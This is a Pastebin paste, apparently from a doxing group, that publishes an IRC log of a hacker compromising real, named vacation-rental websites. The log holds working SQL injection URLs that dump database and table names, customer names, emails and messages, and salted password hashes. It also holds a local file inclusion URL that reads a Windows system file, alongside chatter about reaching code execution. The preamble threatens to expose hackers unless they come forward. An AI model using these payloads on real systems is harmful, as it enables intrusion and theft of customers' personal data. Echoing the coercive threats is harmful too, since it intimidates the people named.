API tools faq
paste
Advertisement
Guest User

ENiGMA Log Release Orbital Hacks Majestic Mountain Vacations

a guest
Oct 17th, 2011
898
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.64 KB | None | 0 0
raw download clone embed print report
  1. ______ ___ __ ________ _______ ___ __ __ ________
  2. /ZP___/\ /__/\ /__/\ /_______/\/______/\ /__//_//_/\ /_______/\
  3. \::AC_\/_\::\_\\ \ \ \__.::._\/\::::__\/__\::\| \| \ \\::: _ \ \
  4. \:\/___/\\:.R`-\ \ \ \::\ \ \:\ /____/\\:. KK \ \\::(_) \ \
  5. \TJ___\/_\:. _ HF\ \ _\::\ \__\:\\_DM_\/ \:.\-/\ \ \\:: __ \ \
  6. \:\____/\\. \`-\ \ \/__\JD\__/\\:\_\ \ \ \. \ \CN\ \\:.\ \RR\ \
  7. \MM_DF\/ \__\/ \__\/\_BB_AA___\/ \_GT_\/ \__\/ \__\/ \__\/\__\/
  8.  
  9. ADD ME ON TWITTER: @ZippieIRC
  10.  
  11. We would like present you with another leak, This time we have incriminating evidence of orbital hacking Majestic Mountain Vacations in Tennessee.
  12.  
  13. We currently have over 200 logs of anonymous hackers like this one. we will post them one at a time identifying a name to each hack. If your company has been hacked, this information can be used in court to prosecute your attackers.
  14.  
  15. Hackers: The only way to prevent a release with your name is to come forward to me ASAP. you can email me at davidhtn @ gmail . com
  16.  
  17. Don't go down like a bitch. We can protect your identity and no one will know you came forward, but only if you are honest with us. if you lie, we pour your dirty laundry out the window. we are tired of the games.
  18.  
  19. <>
  20. Orbital Log 28
  21. <>
  22.  
  23. Aug 16 20:53:34 <orbital> lool
  24. Aug 16 20:53:56 <orbital> but i must say
  25. Aug 16 20:54:06 <orbital> using shitty old sql servers made their website a lot more secure
  26. Aug 16 20:54:29 <orbital> it doesnt even support union it seems
  27. Aug 16 20:54:46 <orbital> it says syntax error
  28. Aug 16 20:54:47 <orbital> :3
  29. Aug 16 20:55:51 <orbital> lul
  30. Aug 16 20:58:07 <orbital> hm weird
  31. Aug 16 20:58:13 <orbital> just union works
  32. Aug 16 21:02:54 <orbital> get them from the database! :D
  33. Aug 16 21:03:02 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=43&amenity=36%29%20union%20select%20null,%27Insert%20Shit%20here%27,null,null,null,null,null,null,null,null,null%20--
  34. Aug 16 21:09:42 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=43&amenity=36%29%20union%20select%201,name,%273%27,4,5,%276%27,7,8,9,10,null%20from%20master..sysdatabases%20--
  35. Aug 16 21:09:43 <orbital> derp
  36. Aug 16 21:13:43 <orbital> lul
  37. Aug 16 21:18:34 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name,%273%27,4,5,%276%27,7,8,9,10,null%20from%20cabin..sysobjects%20where%20xtype%20=%20%27U%27--
  38. Aug 16 21:18:34 <orbital> mkay
  39. Aug 16 21:22:10 <orbital> those are tables
  40. Aug 16 21:22:10 <orbital> in lotsa databases
  41. Aug 16 21:22:11 <orbital> oO
  42. Aug 16 21:36:07 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name,email_addr,4,5,%276%27,7,8,9,10,null%20from%20cc_email%20where%20msg_pm_id%20%3C%201000%20--
  43. Aug 16 21:36:10 <orbital> emails and names
  44. Aug 16 21:36:33 <orbital> only 1000 tho
  45. Aug 16 21:36:47 <orbital> dunno how long the whole database is
  46. Aug 16 21:37:19 <orbital> just did that for speed :P
  47. Aug 16 21:37:35 <orbital> well
  48. Aug 16 21:37:37 <orbital> still
  49. Aug 16 21:37:43 <orbital> you cant request all the info
  50. Aug 16 21:37:47 <orbital> crashes the script
  51. Aug 16 21:37:48 <orbital> :)
  52. Aug 16 21:39:35 <orbital> its np to grab it all
  53. Aug 16 21:39:43 <orbital> i tried with 10000 and it works
  54. Aug 16 21:39:49 <orbital> 10000 chunks is not small
  55. Aug 16 21:39:53 <orbital> :p
  56. Aug 16 21:40:05 <orbital> i found a column named password tho
  57. Aug 16 21:40:08 <orbital> i'll investigate
  58. Aug 16 21:40:42 <orbital> xP
  59. Aug 16 21:54:14 <orbital> :p
  60. Aug 16 22:11:41 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,login,salt%2B%27/%27%2Bpswd,4,5,%276%27,7,8,9,10,null%20from%20entity_pswd--
  61. Aug 16 22:13:55 <orbital> passwords are salted and hashed tho :/
  62. Aug 16 22:18:31 <orbital> http://www.majesticmountainvacations.com/search_results.asp?search_type=2&amenity=-1&amenity=36%29%20union%20select%201,name%2B%27%20-%20%27%2Bemail_addr,convert%28varchar%28max%29,msg%29,4,5,%276%27,record_id,8,9,10,null%20from%20cc_email%20where%20record_id%20%3C%201000%20--
  63. Aug 16 22:18:31 <orbital> sweet
  64. Aug 16 22:23:15 <orbital> ^^
  65. Aug 16 23:22:28 * orbital has quit (Quit: http://www.mibbit.com ajax IRC Client)
  66. Aug 17 07:46:28 * Disconnected (Connection reset by peer).
  67. Aug 17 08:25:55 <orbital> :DP
  68. Aug 17 08:31:58 <orbital> ^^
  69. Aug 17 08:34:07 <orbital> damn they filter backslashes out completely
  70. Aug 17 08:34:12 <orbital> they have local file inclusion all over the place :&
  71. Aug 17 08:34:20 <orbital> but you cant go back in the directory... fuuu
  72. Aug 17 08:34:20 <orbital> :D
  73. Aug 17 08:34:36 <orbital> well actually
  74. Aug 17 08:34:46 <orbital> the windows kernel supports both front and backslash for paths lemme test
  75. Aug 17 08:36:23 <orbital> seems tow ork
  76. Aug 17 08:38:02 <orbital> ye
  77. Aug 17 08:38:10 <orbital> sometimes you gotta love windows :D
  78. Aug 17 08:40:47 <orbital> http://vacationvalleyreservations.com/Reservations/TCSRWeb.dll/PropertyInfo?PropName=God%27s%20Little%20Corner&Header=../../Windows/system.ini&Footer=Footer.htm&TravelAgent=
  79. Aug 17 08:40:49 <orbital> yup works
  80. Aug 17 08:40:49 <orbital> :P
  81. Aug 17 08:44:34 <orbital> well
  82. Aug 17 08:44:40 <orbital> they use asp or sth
  83. Aug 17 08:44:47 <orbital> dunno much aout it
  84. Aug 17 08:44:51 <orbital> i know that with php on windows lfi = remote code execution
  85. Aug 17 08:44:52 <orbital> :P
  86. Aug 17 08:55:32 <orbital> hm jesus i never had this kind of combo for lfi
  87. Aug 17 08:55:33 <orbital> asp+iis
  88. Aug 17 08:55:34 <orbital> urgh
  89. Aug 17 08:56:34 <orbital> PHP&(IIS|Apache) would've been better :/
  90. Aug 17 09:02:30 <orbital> haha
  91. Aug 17 09:02:35 <orbital> yea but php + iis is soooo much fun
  92. Aug 17 09:02:46 <orbital> because you can execute arbitrary code :/
  93. Aug 17 09:02:55 <orbital> its quite cool
  94. Aug 17 09:02:55 <orbital> :D
  95. Aug 17 09:03:24 <orbital> and and linux i do atleast know where the logs n everything are
  96. Aug 17 09:03:30 <orbital> and the passwords
  97. Aug 17 09:04:08 <orbital> maybe they're not even using asp but this weird dll does the job i guess
  98. Aug 17 09:04:14 <orbital> dunno who came up with that but what ever lol
  99.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!